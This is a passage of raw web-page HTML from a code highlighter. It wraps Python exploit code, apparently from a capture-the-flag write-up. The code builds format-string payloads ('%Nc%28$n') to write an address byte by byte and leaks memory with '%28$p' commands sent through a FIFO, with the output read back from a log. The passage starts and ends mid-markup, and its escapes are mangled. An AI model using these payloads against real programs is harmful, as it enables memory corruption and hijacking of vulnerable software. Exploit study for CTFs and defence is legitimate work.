class=\"crayon-v\">aa<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">24<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xff<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">bb<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xff<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xff<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">dd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xff<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">aa<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">34<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">aa_c_payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">aa<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">222<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">aa_c_payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">aa<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">34<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bb<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">34<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">bb_c_payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bb<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">222<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">bb_c_payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bb<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">34<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cc<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">34<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cc_c_payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">222<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cc_c_payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">34<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dd<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">34<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">dd_c_payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">222<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">dd_c_payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">34<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">aa_payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;%&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">aa_c_payload<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;c%28$n&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">bb_payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;%&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">bb_c_payload<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;c%28$n&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cc_payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;%&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cc_c_payload<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;c%28$n&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">dd_payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;%&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">dd_c_payload<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;c%28$n&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">aap<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">basepayload<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">9<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">aa_payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">basepayload<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">aa_payload<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">9<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">bbp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">basepayload<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">9<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bb_payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">basepayload<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">bb_payload<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">9<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ccp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">basepayload<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">9<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cc_payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">basepayload<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cc_payload<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">9<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ddp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">basepayload<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">9<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dd_payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">basepayload<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">dd_payload<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">9<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">aap<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">bbp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">ccp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">ddp<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-36\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-37\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">clearlog<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">fo<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;output\/log&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;w&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">fo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">truncate<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">fo<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-41\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-42\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">readlog<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-43\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">logread<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">line<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">strip<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;n\u0000x00&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">line <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;output\/log&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">logread<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-45\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-46\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">sendcommand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;fifo1&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;a+&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;n&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-50\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-51\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">dump<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">adr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">frmt<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;p&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-52\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">clearlog<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">leak_part<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;show sel %28${}&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">frmt<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">raw_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;I&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">adr<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;x20&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">raw_addr<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;space!&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">leak_part<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;AAAAAAA&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-e\">raw_addr<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-58\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">sendcommand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">time<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6bef4a4e6698506105-60\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">readlog<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6bef4a4e6698506105-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">outbin<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;AAAAAAA&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span 